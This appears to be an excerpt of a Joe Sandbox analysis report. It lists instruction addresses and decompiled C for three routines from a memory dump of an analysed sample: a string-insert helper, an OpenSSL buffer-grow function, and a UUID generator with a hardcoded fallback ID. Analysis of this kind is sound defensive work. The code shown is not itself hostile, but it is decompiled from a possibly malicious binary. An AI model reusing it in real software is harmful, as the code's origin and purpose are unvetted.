                                                                                                    0x00417db9
                                                                                                    0x00417edf
                                                                                                    0x00417ee4
                                                                                                    0x00000000
                                                                                                    0x00417dbf
                                                                                                    0x00417dc1
                                                                                                    0x00417dc3
                                                                                                    0x00417dc6
                                                                                                    0x00417dc7
                                                                                                    0x00417dca
                                                                                                    0x00417dcc
                                                                                                    0x00417dcf
                                                                                                    0x00417dd1
                                                                                                    0x00417dd9
                                                                                                    0x00417ddc
                                                                                                    0x00417ee9
                                                                                                    0x00417ee9
                                                                                                    0x00417eee
                                                                                                    0x00417ef3
                                                                                                    0x00417ef4
                                                                                                    0x00417ef5
                                                                                                    0x00417ef6
                                                                                                    0x00417ef7
                                                                                                    0x00417ef8
                                                                                                    0x00417ef9
                                                                                                    0x00417efa
                                                                                                    0x00417efb
                                                                                                    0x00417efc
                                                                                                    0x00417efd
                                                                                                    0x00417efe
                                                                                                    0x00417eff
                                                                                                    0x00417f00
                                                                                                    0x00417f03
                                                                                                    0x00417f04
                                                                                                    0x00417f05
                                                                                                    0x00417f06
                                                                                                    0x00417f09
                                                                                                    0x00417f0c
                                                                                                    0x00417f10
                                                                                                    0x00417f14
                                                                                                    0x00417f16
                                                                                                    0x00417f16
                                                                                                    0x00417f18
                                                                                                    0x00417f1b
                                                                                                    0x00417f1f
                                                                                                    0x00417f22
                                                                                                    0x00417f24
                                                                                                    0x00417f41
                                                                                                    0x00417f41
                                                                                                    0x00417f41
                                                                                                    0x00417f26
                                                                                                    0x00417f26
                                                                                                    0x00417f30
                                                                                                    0x00417f33
                                                                                                    0x00417f36
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00417f38
                                                                                                    0x00417f3b
                                                                                                    0x00417f3e
                                                                                                    0x00417f3e
                                                                                                    0x00417f3f
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00417f3f
                                                                                                    0x00417f55
                                                                                                    0x00417f58
                                                                                                    0x00417f5b
                                                                                                    0x00417f60
                                                                                                    0x00417f60
                                                                                                    0x00417f43
                                                                                                    0x00417f43
                                                                                                    0x00417f45
                                                                                                    0x00417f6a
                                                                                                    0x00417f6e
                                                                                                    0x00417f47
                                                                                                    0x00417f47
                                                                                                    0x00417f49
                                                                                                    0x00417f65
                                                                                                    0x00417f67
                                                                                                    0x00417f67
                                                                                                    0x00417f67
                                                                                                    0x00000000
                                                                                                    0x00417f4b
                                                                                                    0x00417f4d
                                                                                                    0x00417f4d
                                                                                                    0x00417f52
                                                                                                    0x00417f52
                                                                                                    0x00417f49
                                                                                                    0x00417de2
                                                                                                    0x00417de2
                                                                                                    0x00417de4
                                                                                                    0x00417de7
                                                                                                    0x00417de9
                                                                                                    0x00417deb
                                                                                                    0x00417dee
                                                                                                    0x00417df1
                                                                                                    0x00417dfd
                                                                                                    0x00417df3
                                                                                                    0x00417df5
                                                                                                    0x00417df8
                                                                                                    0x00417df8
                                                                                                    0x00417e00
                                                                                                    0x00417e03
                                                                                                    0x00417e0c
                                                                                                    0x00417e05
                                                                                                    0x00417e07
                                                                                                    0x00417e07
                                                                                                    0x00417e0f
                                                                                                    0x00417e11
                                                                                                    0x00417e2e
                                                                                                    0x00417e33
                                                                                                    0x00417e36
                                                                                                    0x00417e39
                                                                                                    0x00417e39
                                                                                                    0x00417e11
                                                                                                    0x00417e3c
                                                                                                    0x00417e3e
                                                                                                    0x00417e48
                                                                                                    0x00417e4f
                                                                                                    0x00417e55
                                                                                                    0x00417e5a
                                                                                                    0x00417e5c
                                                                                                    0x00417e5e
                                                                                                    0x00417e61
                                                                                                    0x00417e63
                                                                                                    0x00417ea6
                                                                                                    0x00417e65
                                                                                                    0x00417e65
                                                                                                    0x00417e68
                                                                                                    0x00417e6b
                                                                                                    0x00417e71
                                                                                                    0x00417e6d
                                                                                                    0x00417e6d
                                                                                                    0x00417e6d
                                                                                                    0x00417e73
                                                                                                    0x00417e76
                                                                                                    0x00417e7f
                                                                                                    0x00417e78
                                                                                                    0x00417e7a
                                                                                                    0x00417e7a
                                                                                                    0x00417e8a
                                                                                                    0x00417e99
                                                                                                    0x00417e9e
                                                                                                    0x00417ea1
                                                                                                    0x00417ea1
                                                                                                    0x00417ea9
                                                                                                    0x00417ead
                                                                                                    0x00417eb3
                                                                                                    0x00417eaf
                                                                                                    0x00417eaf
                                                                                                    0x00417eaf
                                                                                                    0x00417eb5
                                                                                                    0x00417eb7
                                                                                                    0x00417ec2
                                                                                                    0x00417ec7
                                                                                                    0x00417ecf
                                                                                                    0x00417ecf
                                                                                                    0x00417e40
                                                                                                    0x00417e40
                                                                                                    0x00417e42
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00417e42
                                                                                                    0x00417edc
                                                                                                    0x00417edc
                                                                                                    0x00417ddc
                                                                                                    0x00417d61
                                                                                                    0x00417d61
                                                                                                    0x00417d64
                                                                                                    0x00417d67
                                                                                                    0x00417d6d
                                                                                                    0x00417d69
                                                                                                    0x00417d69
                                                                                                    0x00417d69
                                                                                                    0x00417d6f
                                                                                                    0x00417d71
                                                                                                    0x00000000
                                                                                                    0x00417d73
                                                                                                    0x00417d73
                                                                                                    0x00417d76
                                                                                                    0x00417d7c
                                                                                                    0x00417d78
                                                                                                    0x00417d78
                                                                                                    0x00417d78
                                                                                                    0x00417d7e
                                                                                                    0x00417d84
                                                                                                    0x00417d86
                                                                                                    0x00000000
                                                                                                    0x00417d88
                                                                                                    0x00417d88
                                                                                                    0x00417d8b
                                                                                                    0x00417d91
                                                                                                    0x00417d8d
                                                                                                    0x00417d8d
                                                                                                    0x00417d8d
                                                                                                    0x00417d96
                                                                                                    0x00417dae
                                                                                                    0x00417dae
                                                                                                    0x00417d86
                                                                                                    0x00417d71
                                                                                                    0x00417c29
                                                                                                    0x00417c29
                                                                                                    0x00417c2b
                                                                                                    0x00417c2e
                                                                                                    0x00417c30
                                                                                                    0x00417c32
                                                                                                    0x00417c35
                                                                                                    0x00417c38
                                                                                                    0x00417c41
                                                                                                    0x00417c3a
                                                                                                    0x00417c3c
                                                                                                    0x00417c3c
                                                                                                    0x00417c44
                                                                                                    0x00417c47
                                                                                                    0x00417c50
                                                                                                    0x00417c49
                                                                                                    0x00417c4b
                                                                                                    0x00417c4b
                                                                                                    0x00417c53
                                                                                                    0x00417c55
                                                                                                    0x00417c67
                                                                                                    0x00417c6a
                                                                                                    0x00417c6f
                                                                                                    0x00417c6f
                                                                                                    0x00417c55
                                                                                                    0x00417c72
                                                                                                    0x00417c74
                                                                                                    0x00417c7e
                                                                                                    0x00417c87
                                                                                                    0x00417c8a
                                                                                                    0x00417c8d
                                                                                                    0x00417c92
                                                                                                    0x00417c94
                                                                                                    0x00000000
                                                                                                    0x00417c9a
                                                                                                    0x00417c9a
                                                                                                    0x00417c9c
                                                                                                    0x00417c9e
                                                                                                    0x00417ca1
                                                                                                    0x00417ca4
                                                                                                    0x00417cad
                                                                                                    0x00417ca6
                                                                                                    0x00417ca8
                                                                                                    0x00417ca8
                                                                                                    0x00417cb0
                                                                                                    0x00417cb3
                                                                                                    0x00417cb9
                                                                                                    0x00417cb5
                                                                                                    0x00417cb5
                                                                                                    0x00417cb5
                                                                                                    0x00417cbb
                                                                                                    0x00417cbe
                                                                                                    0x00417cc0
                                                                                                    0x00417cd1
                                                                                                    0x00417cd4
                                                                                                    0x00417cd9
                                                                                                    0x00417cd9
                                                                                                    0x00417cc0
                                                                                                    0x00417cdc
                                                                                                    0x00417ce0
                                                                                                    0x00417ce6
                                                                                                    0x00417ce2
                                                                                                    0x00417ce2
                                                                                                    0x00417ce2
                                                                                                    0x00417ce8
                                                                                                    0x00417cea
                                                                                                    0x00417cf3
                                                                                                    0x00417cf6
                                                                                                    0x00417cfb
                                                                                                    0x00417cfe
                                                                                                    0x00417d02
                                                                                                    0x00417d05
                                                                                                    0x00417d08
                                                                                                    0x00417d1d
                                                                                                    0x00000000
                                                                                                    0x00417d0a
                                                                                                    0x00417d0e
                                                                                                    0x00417d18
                                                                                                    0x00417d18
                                                                                                    0x00417d08
                                                                                                    0x00417c76
                                                                                                    0x00417c76
                                                                                                    0x00417c78
                                                                                                    0x00417d21
                                                                                                    0x00417d29
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00417c78
                                                                                                    0x00417c74
                                                                                                    0x00417c23
                                                                                                    0x00417baf
                                                                                                    0x00417baf
                                                                                                    0x00417bb5
                                                                                                    0x00417bbb
                                                                                                    0x00417bb7
                                                                                                    0x00417bb7
                                                                                                    0x00417bb7
                                                                                                    0x00417bbf
                                                                                                    0x00000000
                                                                                                    0x00417bc1
                                                                                                    0x00417bc4
                                                                                                    0x00417bca
                                                                                                    0x00417bc6
                                                                                                    0x00417bc6
                                                                                                    0x00417bc6
                                                                                                    0x00417bd3
                                                                                                    0x00000000
                                                                                                    0x00417bd5
                                                                                                    0x00417bd8
                                                                                                    0x00417bde
                                                                                                    0x00417bda
                                                                                                    0x00417bda
                                                                                                    0x00417bda
                                                                                                    0x00417bf9
                                                                                                    0x00417bf9
                                                                                                    0x00417bd3
                                                                                                    0x00417bbf

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.651464956.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.651464956.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.651464956.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_9721.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: _memmove
                                                                                                    • String ID: invalid string position$string too long
                                                                                                    • API String ID: 4104443479-4289949731
                                                                                                    • Opcode ID: b2c1af29de5962b74b57e5661815869f54c56e8a90a0ab9c91a19098a667a223
                                                                                                    • Instruction ID: 16eedd03d570a769cf24423414cb71a1906862ef28ca1dd771941f38c47b8a04
                                                                                                    • Opcode Fuzzy Hash: b2c1af29de5962b74b57e5661815869f54c56e8a90a0ab9c91a19098a667a223
                                                                                                    • Instruction Fuzzy Hash: C451C3317081089BDB24CE1CD980AAA77B6EF85714B24891FF856CB381DB35EDD18BD9
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    C-Code - Quality: 60%
                                                                                                    			E00414160(signed int __eax, void* __ebx, intOrPtr* __ecx, signed int __edi, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
                                                                                                    				intOrPtr _v8;
                                                                                                    				intOrPtr* _v20;
                                                                                                    				void* __ebp;
                                                                                                    				intOrPtr* _t24;
                                                                                                    				intOrPtr _t31;
                                                                                                    				intOrPtr* _t34;
                                                                                                    				intOrPtr _t38;
                                                                                                    				intOrPtr* _t39;
                                                                                                    				intOrPtr* _t48;
                                                                                                    				intOrPtr* _t51;
                                                                                                    				intOrPtr _t53;
                                                                                                    				intOrPtr* _t56;
                                                                                                    				intOrPtr* _t57;
                                                                                                    				signed int _t59;
                                                                                                    				void* _t60;
                                                                                                    				intOrPtr* _t63;
                                                                                                    				void* _t67;
                                                                                                    
                                                                                                    				_push(__ecx);
                                                                                                    				_push(__ebx);
                                                                                                    				_t63 = __ecx;
                                                                                                    				_push(__edi);
                                                                                                    				_t59 = __edi | 0xffffffff;
                                                                                                    				_t51 =  *((intOrPtr*)(__ecx + 0x10));
                                                                                                    				if(_t51 < _a4) {
                                                                                                    					L32:
                                                                                                    					_push("invalid string position");
                                                                                                    					E0044F26C(__eflags);
                                                                                                    					asm("int3");
                                                                                                    					asm("int3");
                                                                                                    					asm("int3");
                                                                                                    					asm("int3");
                                                                                                    					asm("int3");
                                                                                                    					asm("int3");
                                                                                                    					__eflags =  *((intOrPtr*)(_t51 + 0x14)) - 0x10;
                                                                                                    					_t24 = _v20;
                                                                                                    					if( *((intOrPtr*)(_t51 + 0x14)) >= 0x10) {
                                                                                                    						_t51 =  *_t51;
                                                                                                    					}
                                                                                                    					 *_t24 = _t51;
                                                                                                    					return _t24;
                                                                                                    				} else {
                                                                                                    					_t48 = _a8;
                                                                                                    					_t5 = _t48 + 0x10; // 0xcccccccc
                                                                                                    					_t60 =  <  ?  *_t5 : _t59;
                                                                                                    					if((__eax | 0xffffffff) - _t51 <= _t60) {
                                                                                                    						_push("string too long");
                                                                                                    						E0044F23E(__eflags);
                                                                                                    						goto L32;
                                                                                                    					} else {
                                                                                                    						if(_t60 != 0) {
                                                                                                    							_push(0);
                                                                                                    							_v8 = _t51 + _t60;
                                                                                                    							if(E00415810(_t48, __ecx, _t60, _t51 + _t60) != 0) {
                                                                                                    								_t31 =  *((intOrPtr*)(__ecx + 0x14));
                                                                                                    								if(_t31 < 0x10) {
                                                                                                    									_a8 = __ecx;
                                                                                                    								} else {
                                                                                                    									_a8 =  *__ecx;
                                                                                                    								}
                                                                                                    								if(_t31 < 0x10) {
                                                                                                    									_t56 = _t63;
                                                                                                    								} else {
                                                                                                    									_t56 =  *_t63;
                                                                                                    								}
                                                                                                    								_t53 = _a4;
                                                                                                    								_t33 =  *((intOrPtr*)(_t63 + 0x10)) != _t53;
                                                                                                    								if( *((intOrPtr*)(_t63 + 0x10)) != _t53) {
                                                                                                    									E004205A0(_t56 + _t53 + _t60, _a8 + _t53, _t33);
                                                                                                    									_t53 = _a4;
                                                                                                    									_t67 = _t67 + 0xc;
                                                                                                    								}
                                                                                                    								if(_t63 != _t48) {
                                                                                                    									__eflags =  *((intOrPtr*)(_t48 + 0x14)) - 0x10;
                                                                                                    									if( *((intOrPtr*)(_t48 + 0x14)) >= 0x10) {
                                                                                                    										_t48 =  *_t48;
                                                                                                    									}
                                                                                                    									__eflags =  *((intOrPtr*)(_t63 + 0x14)) - 0x10;
                                                                                                    									if( *((intOrPtr*)(_t63 + 0x14)) < 0x10) {
                                                                                                    										_t34 = _t63;
                                                                                                    									} else {
                                                                                                    										_t34 =  *_t63;
                                                                                                    									}
                                                                                                    									__eflags = _t60;
                                                                                                    									if(_t60 != 0) {
                                                                                                    										__eflags = _t34 + _t53;
                                                                                                    										E0042D8D0(_t34 + _t53, _t48, _t60);
                                                                                                    										goto L28;
                                                                                                    									}
                                                                                                    								} else {
                                                                                                    									_t38 =  *((intOrPtr*)(_t63 + 0x14));
                                                                                                    									if(_t38 < 0x10) {
                                                                                                    										_t57 = _t63;
                                                                                                    									} else {
                                                                                                    										_t57 =  *_t63;
                                                                                                    									}
                                                                                                    									if(_t38 < 0x10) {
                                                                                                    										_t39 = _t63;
                                                                                                    									} else {
                                                                                                    										_t39 =  *_t63;
                                                                                                    									}
                                                                                                    									if(_t60 != 0) {
                                                                                                    										E004205A0(_t39 + _t53, _t57, _t60);
                                                                                                    										L28:
                                                                                                    									}
                                                                                                    								}
                                                                                                    								E00414460(_t63, _v8);
                                                                                                    							}
                                                                                                    						}
                                                                                                    						return _t63;
                                                                                                    					}
                                                                                                    				}
                                                                                                    			}




















                                                                                                    0x00414163
                                                                                                    0x00414164
                                                                                                    0x00414166
                                                                                                    0x00414168
                                                                                                    0x00414169
                                                                                                    0x0041416c
                                                                                                    0x00414172
                                                                                                    0x00414260
                                                                                                    0x00414260
                                                                                                    0x00414265
                                                                                                    0x0041426a
                                                                                                    0x0041426b
                                                                                                    0x0041426c
                                                                                                    0x0041426d
                                                                                                    0x0041426e
                                                                                                    0x0041426f
                                                                                                    0x00414273
                                                                                                    0x00414277
                                                                                                    0x0041427a
                                                                                                    0x0041427c
                                                                                                    0x0041427c
                                                                                                    0x0041427e
                                                                                                    0x00414281
                                                                                                    0x00414178
                                                                                                    0x00414178
                                                                                                    0x0041417f
                                                                                                    0x0041417f
                                                                                                    0x0041418a
                                                                                                    0x00414256
                                                                                                    0x0041425b
                                                                                                    0x00000000
                                                                                                    0x00414190
                                                                                                    0x00414192
                                                                                                    0x0041419d
                                                                                                    0x004141a0
                                                                                                    0x004141aa
                                                                                                    0x004141b0
                                                                                                    0x004141b6
                                                                                                    0x004141bf
                                                                                                    0x004141b8
                                                                                                    0x004141ba
                                                                                                    0x004141ba
                                                                                                    0x004141c5
                                                                                                    0x004141cb
                                                                                                    0x004141c7
                                                                                                    0x004141c7
                                                                                                    0x004141c7
                                                                                                    0x004141d0
                                                                                                    0x004141d3
                                                                                                    0x004141d5
                                                                                                    0x004141e4
                                                                                                    0x004141e9
                                                                                                    0x004141ec
                                                                                                    0x004141ec
                                                                                                    0x004141f1
                                                                                                    0x0041421c
                                                                                                    0x00414220
                                                                                                    0x00414222
                                                                                                    0x00414222
                                                                                                    0x00414224
                                                                                                    0x00414228
                                                                                                    0x0041422e
                                                                                                    0x0041422a
                                                                                                    0x0041422a
                                                                                                    0x0041422a
                                                                                                    0x00414230
                                                                                                    0x00414232
                                                                                                    0x00414235
                                                                                                    0x00414239
                                                                                                    0x00000000
                                                                                                    0x00414239
                                                                                                    0x004141f3
                                                                                                    0x004141f3
                                                                                                    0x004141f9
                                                                                                    0x004141ff
                                                                                                    0x004141fb
                                                                                                    0x004141fb
                                                                                                    0x004141fb
                                                                                                    0x00414204
                                                                                                    0x0041420a
                                                                                                    0x00414206
                                                                                                    0x00414206
                                                                                                    0x00414206
                                                                                                    0x0041420e
                                                                                                    0x00414215
                                                                                                    0x0041423e
                                                                                                    0x0041423e
                                                                                                    0x0041420e
                                                                                                    0x00414246
                                                                                                    0x00414246
                                                                                                    0x004141aa
                                                                                                    0x00414253
                                                                                                    0x00414253
                                                                                                    0x0041418a

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.651464956.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.651464956.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.651464956.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_9721.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: _memmove
                                                                                                    • String ID: invalid string position$string too long
                                                                                                    • API String ID: 4104443479-4289949731
                                                                                                    • Opcode ID: 1860cadd0784f8812835e732d2f60387060861baec5cac242feb419a09eb11c6
                                                                                                    • Instruction ID: c789d4a5c221ce0c411dffae1b259be01e75b302f83ceaf2f45b858c9c7e4579
                                                                                                    • Opcode Fuzzy Hash: 1860cadd0784f8812835e732d2f60387060861baec5cac242feb419a09eb11c6
                                                                                                    • Instruction Fuzzy Hash: 3D311430300204ABDB28DE5CD8859AA77B6EFC17507600A5EF865CB381D739EDC18BAD
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    C-Code - Quality: 96%
                                                                                                    			E0045AD50(void* __ebx, void* __edx, void* __ebp, char _a4, char _a8) {
                                                                                                    				void* __edi;
                                                                                                    				intOrPtr _t17;
                                                                                                    				intOrPtr _t18;
                                                                                                    				signed int _t36;
                                                                                                    				intOrPtr _t44;
                                                                                                    				intOrPtr* _t45;
                                                                                                    				intOrPtr _t46;
                                                                                                    
                                                                                                    				_t48 = __ebp;
                                                                                                    				_t1 =  &_a8; // 0x463743
                                                                                                    				_t46 =  *_t1;
                                                                                                    				_t2 =  &_a4; // 0x463743
                                                                                                    				_t45 =  *_t2;
                                                                                                    				_t39 =  *_t45;
                                                                                                    				if( *_t45 >= _t46) {
                                                                                                    					L3:
                                                                                                    					 *_t45 = _t46;
                                                                                                    					return _t46;
                                                                                                    				} else {
                                                                                                    					if( *(_t45 + 8) < _t46) {
                                                                                                    						__eflags = _t46 - 0x5ffffffc;
                                                                                                    						if(__eflags <= 0) {
                                                                                                    							_t17 =  *((intOrPtr*)(_t45 + 4));
                                                                                                    							_push(__ebx);
                                                                                                    							_t36 = 0xaaaaaaab * (_t46 + 3) >> 0x20 >> 1 << 2;
                                                                                                    							__eflags = _t17;
                                                                                                    							if(_t17 != 0) {
                                                                                                    								_t18 = E00454F30(_t17, _t36, ".\\crypto\\buffer\\buffer.c", 0x7b);
                                                                                                    							} else {
                                                                                                    								_t18 = E00454E50(_t36, ".\\crypto\\buffer\\buffer.c", 0x79);
                                                                                                    							}
                                                                                                    							_t44 = _t18;
                                                                                                    							__eflags = _t44;
                                                                                                    							if(__eflags != 0) {
                                                                                                    								__eflags = _t46 -  *_t45;
                                                                                                    								 *((intOrPtr*)(_t45 + 4)) = _t44;
                                                                                                    								 *(_t45 + 8) = _t36;
                                                                                                    								E0042B420( *_t45 + _t44, 0, _t46 -  *_t45);
                                                                                                    								 *_t45 = _t46;
                                                                                                    								return _t46;
                                                                                                    							} else {
                                                                                                    								E004512D0(_t36, _t44, _t45, _t48, __eflags, 7, 0x64, 0x41, ".\\crypto\\buffer\\buffer.c", 0x7e);
                                                                                                    								__eflags = 0;
                                                                                                    								return 0;
                                                                                                    							}
                                                                                                    						} else {
                                                                                                    							E004512D0(__ebx, __edx, _t45, __ebp, __eflags, 7, 0x64, 0x41, ".\\crypto\\buffer\\buffer.c", 0x74);
                                                                                                    							__eflags = 0;
                                                                                                    							return 0;
                                                                                                    						}
                                                                                                    					} else {
                                                                                                    						E0042B420( *((intOrPtr*)(_t45 + 4)) + _t39, 0, _t46 - _t39);
                                                                                                    						goto L3;
                                                                                                    					}
                                                                                                    				}
                                                                                                    			}










                                                                                                    0x0045ad50
                                                                                                    0x0045ad51
                                                                                                    0x0045ad51
                                                                                                    0x0045ad56
                                                                                                    0x0045ad56
                                                                                                    0x0045ad5a
                                                                                                    0x0045ad5e
                                                                                                    0x0045ad7a
                                                                                                    0x0045ad7a
                                                                                                    0x0045ad80
                                                                                                    0x0045ad60
                                                                                                    0x0045ad63
                                                                                                    0x0045ad81
                                                                                                    0x0045ad87
                                                                                                    0x0045adad
                                                                                                    0x0045adb0
                                                                                                    0x0045adb5
                                                                                                    0x0045adb8
                                                                                                    0x0045adba
                                                                                                    0x0045add7
                                                                                                    0x0045adbc
                                                                                                    0x0045adc4
                                                                                                    0x0045adc9
                                                                                                    0x0045addf
                                                                                                    0x0045ade1
                                                                                                    0x0045ade3
                                                                                                    0x0045ae06
                                                                                                    0x0045ae08
                                                                                                    0x0045ae11
                                                                                                    0x0045ae15
                                                                                                    0x0045ae1d
                                                                                                    0x0045ae24
                                                                                                    0x0045ade5
                                                                                                    0x0045adf2
                                                                                                    0x0045adfa
                                                                                                    0x0045ae01
                                                                                                    0x0045ae01
                                                                                                    0x0045ad89
                                                                                                    0x0045ad96
                                                                                                    0x0045ad9e
                                                                                                    0x0045ada2
                                                                                                    0x0045ada2
                                                                                                    0x0045ad65
                                                                                                    0x0045ad72
                                                                                                    0x00000000
                                                                                                    0x0045ad77
                                                                                                    0x0045ad63

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.651464956.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.651464956.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.651464956.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_9721.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: _memset
                                                                                                    • String ID: .\crypto\buffer\buffer.c$C7F
                                                                                                    • API String ID: 2102423945-2013712220
                                                                                                    • Opcode ID: fce9da4f2685e8a546a1aead5558aa77959c7a2ce52c5fe1bdde6675f364ff59
                                                                                                    • Instruction ID: 54406e9f1970e0e1dce797ef07034894a3cffcceb7efccd845a222dac3d76e8e
                                                                                                    • Opcode Fuzzy Hash: fce9da4f2685e8a546a1aead5558aa77959c7a2ce52c5fe1bdde6675f364ff59
                                                                                                    • Instruction Fuzzy Hash: 91216DB1B443213BE200655DFC83B15B395EB84B19F104127FA18D72C2D2B8BC5982D9
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    C-Code - Quality: 23%
                                                                                                    			E0040C5C0(void* __ebx, char* __ecx) {
                                                                                                    				intOrPtr _v20;
                                                                                                    				char _v24;
                                                                                                    				intOrPtr _v36;
                                                                                                    				char _v40;
                                                                                                    				char _v44;
                                                                                                    				char _v48;
                                                                                                    				char _v52;
                                                                                                    				char _v56;
                                                                                                    				intOrPtr* _v64;
                                                                                                    				char _v72;
                                                                                                    				intOrPtr _v76;
                                                                                                    				void* __edi;
                                                                                                    				char* _t19;
                                                                                                    				intOrPtr _t24;
                                                                                                    				void* _t31;
                                                                                                    				intOrPtr* _t34;
                                                                                                    				void* _t35;
                                                                                                    				intOrPtr* _t38;
                                                                                                    				void* _t39;
                                                                                                    				void* _t42;
                                                                                                    				char* _t43;
                                                                                                    
                                                                                                    				_t31 = __ebx;
                                                                                                    				_t19 =  &_v44;
                                                                                                    				_v48 = 0;
                                                                                                    				_t43 = __ecx;
                                                                                                    				__imp__UuidCreate(_t19, _t39, _t42);
                                                                                                    				if(_t19 != 0) {
                                                                                                    					L9:
                                                                                                    					_push(0x24);
                                                                                                    					 *((intOrPtr*)(_t43 + 0x14)) = 0xf;
                                                                                                    					 *((intOrPtr*)(_t43 + 0x10)) = 0;
                                                                                                    					 *_t43 = 0;
                                                                                                    					E004156D0(_t31, _t43, _t39, "8a4577dc-de55-4eb5-b48a-8a3eee60cd95");
                                                                                                    					goto L10;
                                                                                                    				} else {
                                                                                                    					_v56 = _t19;
                                                                                                    					__imp__UuidToStringA( &_v48,  &_v56);
                                                                                                    					_t38 = _v64;
                                                                                                    					if(_t38 == 0) {
                                                                                                    						goto L9;
                                                                                                    					} else {
                                                                                                    						_v20 = 0xf;
                                                                                                    						_v24 = 0;
                                                                                                    						_v40 = 0;
                                                                                                    						if( *_t38 != 0) {
                                                                                                    							_t34 = _t38;
                                                                                                    							_t39 = _t34 + 1;
                                                                                                    							do {
                                                                                                    								_t24 =  *_t34;
                                                                                                    								_t34 = _t34 + 1;
                                                                                                    							} while (_t24 != 0);
                                                                                                    							_t35 = _t34 - _t39;
                                                                                                    						} else {
                                                                                                    							_t35 = 0;
                                                                                                    						}
                                                                                                    						E004156D0(_t31,  &_v40, _t39, _t38);
                                                                                                    						__imp__RpcStringFreeA( &_v72, _t35);
                                                                                                    						_v76 = 0;
                                                                                                    						E00412CA0(_t43,  &_v52);
                                                                                                    						if(_v36 < 0x10) {
                                                                                                    							L10:
                                                                                                    							return _t43;
                                                                                                    						} else {
                                                                                                    							L00422587(_v48);
                                                                                                    							return _t43;
                                                                                                    						}
                                                                                                    					}
                                                                                                    				}
                                                                                                    			}
























                                                                                                    0x0040c5c0
                                                                                                    0x0040c5cb
                                                                                                    0x0040c5cf
                                                                                                    0x0040c5d8
                                                                                                    0x0040c5da
                                                                                                    0x0040c5e2
                                                                                                    0x0040c675
                                                                                                    0x0040c675
                                                                                                    0x0040c677
                                                                                                    0x0040c680
                                                                                                    0x0040c68c
                                                                                                    0x0040c68f
                                                                                                    0x00000000
                                                                                                    0x0040c5e8
                                                                                                    0x0040c5e8
                                                                                                    0x0040c5f6
                                                                                                    0x0040c5fc
                                                                                                    0x0040c602
                                                                                                    0x00000000
                                                                                                    0x0040c604
                                                                                                    0x0040c604
                                                                                                    0x0040c60c
                                                                                                    0x0040c614
                                                                                                    0x0040c61c
                                                                                                    0x0040c622
                                                                                                    0x0040c624
                                                                                                    0x0040c627
                                                                                                    0x0040c627
                                                                                                    0x0040c629
                                                                                                    0x0040c62a
                                                                                                    0x0040c62e
                                                                                                    0x0040c61e
                                                                                                    0x0040c61e
                                                                                                    0x0040c61e
                                                                                                    0x0040c636
                                                                                                    0x0040c640
                                                                                                    0x0040c64a
                                                                                                    0x0040c655
                                                                                                    0x0040c65f
                                                                                                    0x0040c694
                                                                                                    0x0040c69b
                                                                                                    0x0040c661
                                                                                                    0x0040c665
                                                                                                    0x0040c674
                                                                                                    0x0040c674
                                                                                                    0x0040c65f
                                                                                                    0x0040c602

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    • 8a4577dc-de55-4eb5-b48a-8a3eee60cd95, xrefs: 0040C687
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.651464956.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.651464956.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.651464956.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_9721.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: StringUuid$CreateFree
                                                                                                    • String ID: 8a4577dc-de55-4eb5-b48a-8a3eee60cd95
                                                                                                    • API String ID: 3044360575-2335240114
                                                                                                    • Opcode ID: 5898d431aa7bc51d8275c67bd3d0945cf80b17b08d4c1006f571a635e441fa64
                                                                                                    • Instruction ID: 0eb901185732211e3be4e37390737b2086ad5c5ed8a4bd7d6c842829bf201ec1
                                                                                                    • Opcode Fuzzy Hash: 5898d431aa7bc51d8275c67bd3d0945cf80b17b08d4c1006f571a635e441fa64
                                                                                                    • Instruction Fuzzy Hash: 6C21D771208341ABD7209F24D844B9BBBE8AF81758F004E6FF88993291D77A9549879A
                                                                                                    Uniqueness

